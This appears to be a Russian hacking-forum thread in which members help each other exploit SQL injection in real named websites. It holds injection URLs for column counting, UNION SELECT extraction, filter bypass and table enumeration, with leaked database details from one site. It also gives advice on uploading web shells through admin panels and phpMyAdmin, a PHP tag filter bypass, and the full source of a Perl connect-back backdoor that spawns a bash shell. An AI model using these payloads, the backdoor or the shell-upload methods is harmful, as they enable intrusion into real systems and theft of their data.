я в ящик зашел , Но как терь пароль то узнать?
плиз сильно не пинайте, человек существо любопытное, все ему интересно, я делаю это первый раз ...
подскажите если не трудно возможно ли узнать пароль как то ?

>подскажите если не трудно возможно ли узнать пароль как то ?
нет

пацаны,а как дальше?
http://www.hobby.net.ua/product_info.php?cPath=132&products_id=74266%27%20order%20by%203/*

там нет скули. Просто нет

Вопрос по sql-injection

Вообщем есть скула, вида
http://site/551111', ошибка ессно не выводится

После некоторых манипуляций:
http://site/1111) -- -- comment
Ошибку не выдает, причем обязательно после двух "-- --"

Запрос вида
-1) OR id IN(5,6,7,8) ) ORDER BY id LIMIT 2-- -- comment
работает, поэтому смею предположить, что запрос однострочный, или это его последняя строка

Но вот дальше, не могу понять в чем дело :(

Запросы вида:
-1 ) GROUP by 1
-1 ) UNION SELECT 1
- не работают

cо вторым понятно, что скорее всего, в запросе стоит "SELECT * ", а не "SELECT `id`, ...", что вызывает ошибку different numbers of columns

Но как быть со вторым?
причем что
-1 ) GROUP by id
работает

И вот еще такое замечание
-1 ) ORDER BY 1 -- --
Работает, но любое другое значение отличное от единицы уже не работает, напр
-1 ) ORDER BY 2 -- --

запрос скорее всего с join-ами

прошу помочь советом

пс
Начинаю думать, что на станице 2 запроса, один для получения поля, для второго запроса, а второй непосредственно для отображения инфы

тут сайтец с скуль уязвимостью...

http://www.mediacomp.ru/?action=sub_kat&top_kat=-1,union+select+1/*

самое ссмешное то что я подобрал до 72 и нифига ничего не вылезло.... что предложите сделать ....?

Пример order+by

http://www.mediacomp.ru/?action=sub_kat&top_kat=1+order+by+1--
нет ошибки, полей больше одного.
htthttp://www.mediacomp.ru/?action=sub_kat&top_kat=1+order+by+100--
ошибка, полей меньше ста
http://www.mediacomp.ru/?action=sub_kat&top_kat=1+order+by+99--
нет ошибки, значит полей 99

farex
Мухаха, слушай дружище, ты подвязывай с тяжёлыми наркотиками , а то я минуса буду ставить :)

Это цитата с этого поста :
http://forum.antichat.ru/showpost.php?p=433629&postcount=25

Это 3 страница топика, а мы сейчас на 622 :D

да ладно тебе Jokester , человек хотел помочь, главное что хотел :))))))
ну а ефект такой может и после легких наркотиков :))

Упс ....... больше не буду.... :)
cannabis ...... не наркотик...

такая проблема...с одного сайта из админки пытаюсь зались шел. Ситуация такая: Файлы можно загружать любые, расширение не фильтруется, после аплоада файл получает адрес host/files/1(2,3,4... etc) . В реальность каталога files нету, а двиг скриптом перебрасывает все запросы с /files/1,2,3... на /docs/1,2,3 .
Но проблема в другом. Все реально существующие файлы из /docs фильтруются на '<?' и '?>'. Вопрос - как можно обойти такую фильтрацию и таки выполнить php код? Пробывал URL-енкод - не вышло. АСП сервер не поддерживает...

Если там идет поиск по шаблону - видать никак. А если на конкретную фразу - пробуй <?php без закрывающего.

<script language="php">
echo ("некоторые редакторы (например, FrontPage) не
любят инструкции обработки");
</script>
(c) http://ru2.php.net/manual/ru/language.basic-syntax.phpmode.php

залей штацес и перловый шелл

Пиплы,что делать,если не биндится тачко ? (Тачко прова).Открыты только 21,80 и 3306 порты:(.Доступ к бд есть.Права www юзера)

ЗЫ: Веб шелл имеетсо...

ну хз, попробуй бек-коннект сделать

Бэкконнект...чем ?)

Ещё вопрос не по теме: если данные,полученные из базы,обрабатываются htmlspecialchars() без констант и addslashes() аналогично.Уязвимы ли они ?

1)#!/usr/bin/perl
use IO::Socket;
# Priv8 ** Priv8 ** Priv8
# IRAN HACKERS SABOTAGE Connect Back Shell
# code by:LorD
# We Are :LorD-C0d3r-NT-\x90
# Email:LorD@ihsteam.com
#
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
# Resolving HostName
# Connecting... 127.0.0.1
# Spawning Shell
# Connected to remote host

#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/bash';
$ARGC=@ARGV;
print "IHS BACK-CONNECT BACKDOOR\n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print " Resolving HostName\n";
print " Connecting... $ARGV[0] \n";
print " Spawning Shell \n";
print " Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "IHS BACK-CONNECT BACKDOOR \n\n";
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF
2)наврядли :(

Бэкконнект...чем ?)шеллом=)
Ещё вопрос не по теме: если данные,полученные из базы,обрабатываются htmlspecialchars() без констант и addslashes() аналогично.Уязвимы ли они ?для xss неуязвимы, а для sql inj могут быть уязвимы.
наверно...

Ммм...сомневаюсь,что неуязвимы.А вот скули точно идут напролом))).

ЗЫ: Вот пример :



<?php

$x = mysql_connect("localhost","root","root");

$q = mysql_query("select concat_ws(0x3a,user,password) from mysql.user where user=".htmlspecialchars($_GET['user']));

$arr = mysql_fetch_array($q);

echo $arr[0];





?>



Принимает всё,что угодно )) Вот только меня удивило,почему при запросе xxxx+and+1=5-- ничего не выводит,а при запросе xxxx+order+by+5-- выводит ошибку,мол количество полей неверно.Ведь 1 AND 1 !=5,но за ошибку он это не посчитал))

1 AND 1 !=5
1 и правда не равно 5
И причём здесь вообще order+by ?

1 и правда не равно 5
И причём здесь вообще order+by ?

А при том,что order by и 1 and 1 = 5 - запросы.А правильные запросы при нормальном инжекте должны возвращать результат,но никак не ошибку. При 1 and 1 = 1 я наблюдал то же,что и при 1 and 1 = 5.По-твоему,ит`с нормалли?

ЗЫ: А я что,доказывал,что 1 равно пяти ?

1)


Уна бля ту коннект ту х**...

А при том,что order by и 1 and 1 = 5 - запросы.А правильные запросы при нормальном инжекте должны возвращать результат,но никак не ошибку. При 1 and 1 = 1 я наблюдал то же,что и при 1 and 1 = 5.По-твоему,ит`с нормалли?

ЗЫ: А я что,доказывал,что 1 равно пяти ?
Это всё ясно, так order by конструкция тут причём? Веля ты чё то путаешь!!! То что при 1 and 1 = 1 и 1 and 1 = 5 одно и то же выдаёт это не есть норма, но
order by то тут причем?

http://www.orden-justice.ru/news/608'

Что это? Можно ли как нибуть заюзать?

Можно. Раскрытие путей

столкнулся с такой траблой:
есть уязвимый параметр: id=1
подобрал количество полей: id=1+order+by+15
вывел их через union: id=9999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15
почти все оказались принтабельны и цифры отобразились, но стоит вместо любой из цифр вставить например version(), то происходит ошибка.
дихотомическим поиском id=1+/*!40112+AND+0+*/ выяснил версию мускула
еще такая странность,
если ...select+1,2,3,4,5,6.... на месте 5 выводится Астана
а если например поставить другую цифру ...select+1,2,3,4,33,6.... то выводится другой город

вообщем хотелось бы узнать при каких условиях такое возможно - я так полагаю, что там принудительный перевод в Integer и String там не заюзать
либо там в скрипте выполняются 2 запроса к базе подряд причем с одинаковым количеством полей

кто что думает по ӕтому поводу?

а если поставишь id=1+and+1=2+ тоже будет так выводить ?
кавычки тоже фильтруются ? поставь id=1'+union+..

id=1+and+1=2 выдает ошибку
id=1+and+1=1 выдает идентично id=1 что и следовало ожидать

http://www.muslab.ru/msg.php?msg_id=-166884+and+1=2+union+select+1,2,3,4,5,6,7,8,versio n(),10,11,12,13,14,15 выдает теже самые принтабельные поля, что странно.
любая кавычка вызывает ошибку

вообщем выше собственно сам линк расковыряйте кому интересно - сайт сам по себе ценности не представляет просто стало интересно раскрутить ӕтот скуль
если кто раскрутит напишите каким методом ӕто удалось )

http://www.muslab.ru/msg.php?msg_id=-166884+UNION+SELECT+1,2,3,4,5,6,7,8,AES_DECRYPT(AE S_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User ()),0x71),0x71),10,11,12,13,14,15/*

Database Version: 4.1.11-Debian_4sarge2-log
Database name: k4dre_data
User name: k4dre_data@77.221.130.1

не понял в чем проблема?

Бля писец проблему нашли!!! version() здесь просто фильтруется!!!

Вот вывод:

http://www.muslab.ru/msg.php?msg_id=-166884+union+select+1,2,3,4,5,6,7,8,unhex(hex(vers ion())),10,11,12,13,14,15

странно - я пробовал криптовать но нифига не выходило - видать где-то ступил
сори ) и спс

Бля писец проблему нашли!!!
ну куле, бывает :D

Бля писец проблему нашли!!! version() здесь просто фильтруется!!!

Вот вывод:

http://www.muslab.ru/msg.php?msg_id=-166884+union+select+1,2,3,4,5,6,7,8,unhex(hex(vers ion())),10,11,12,13,14,15
Не нужно писать чушь в перемешку с матом. О какой фильтрации ты говоришь? И что по твоему делает твой запрос? Обходит фильтрацию?

Jokester не злись, просто вот сюда http://forum.antichat.ru/thread104591.html всех надо посылать, благо много там познавательного

Не нужно писать чушь в перемешку с матом. О какой фильтрации ты говоришь? И что по твоему делает твой запрос? Обходит фильтрацию?
Причём тут чушь? На мой взгляд дело в несовмеситимости кодировок, что можно обойти как вариантом предложенным Gorev'ым так и моим...
Может я чёт невдупляю, так ты поясни в чём моя ошибка...
Начёт мата, не знал что бл* матом считать то можно)

DrAssault Кодировка и фильтрация , это абсолютно разные вещи. Сдесь кодировка, а фильтрация так не обходится, и обходиться не может.

Мои пояснения (в том числе по этому вопросу) можно увидеть по линку приведённому Gorev'ым в посте выше

Подскажите плз, как быть.
нашел незапороленный пхпмай адмни.
Пытаюсь залить шел, пишет

import.php: Missing parameter: import_type (FAQ 2.8)
import.php: Missing parameter: format (FAQ 2.8)

и как быть?

DrAssault Кодировка и фильтрация , это абсолютно разные вещи.
Я понимаю, что это разные вещи, глянул бегло, получил вывод, но в подробности не вдавался, во втором посте дыбнул осмысленно и исправился...
Сдесь кодировка, а фильтрация так не обходится, и обходиться не может.
Эт ясно что сдесь кодировка, но что ты имеешь ввиду под словами "фильтрация так не обходится, и обходиться не может"? А если фильтруется version() к примеру?

Эт ясно что сдесь кодировка, но что ты имеешь ввиду под словами "фильтрация так не обходится, и обходиться не может"? А если фильтруется version() к примеру?

Под словами "фильтрация так не обходится, и обходиться не может" я подразумеваю фразу "фильтрация так не обходится, и обходиться не может", без всяких двусмысленностей и эвфемизмов . Тоесть данную фразу нужно воспринимать буквально, по написанию :)

Если скрипт парсит GET , ну или любой массив , в котором ты передаёшь данные на предмет нахождения в нём строки "version", и завершает работу , при нахождении её (ну или режет\заменяет), то никакие унхексы, хексы и энкрипты ему не помешают это сделать.

jokester приношу извинения, тупанул чёто я, видимо не в себе был) понял, что смотрозил, сегодня даже для пущей уверенности протестил) ты прав...

DrAssault Кодировка и фильтрация , это абсолютно разные вещи. Сдесь кодировка, а фильтрация так не обходится, и обходиться не может.



Воистину те +10))

Ни разу не встречал.что версион() фильтруется,но вот ( и ) сто раз уже встречал))),а как обходить не придумал ).

Так что с бекконектом-то делать ? Не забивать из-за unable to connect)

Ни разу не встречал.что версион() фильтруется,но вот ( и ) сто раз уже встречал))),а как обходить не придумал ).
На HackZona.ru к примеру режется version() ;) а как обходить ( и ) это уже зависит от конкретной ситуации...

перечитал очень много всего, не могу найти ответ, как обойти подстановку суффикса (abc.) к имени базы при попытке перебора.

пробую: UNION+SELECT+1,db+from+mysql.db+LIMIT+1,1/*
выводит: test

пробую:UNION+SELECT+1,id+from+test+LIMIT+1,1/*
выводит: [Table 'abc.test' doesn't exist]

буду благодарен тем кто поможет добить таргет: пишите в асю.

2 LLIop0x:

))) Значение из колонки прежде чем выводить, имя таблицы узнай:

UNION+SELECT+1,table_name+from+information_schema. tables/*

2 LLIop0x: если версия 4-я мускула, то только методом "тыка" подбирать таблички, если 5-я версия то способ который предлогал Pashkela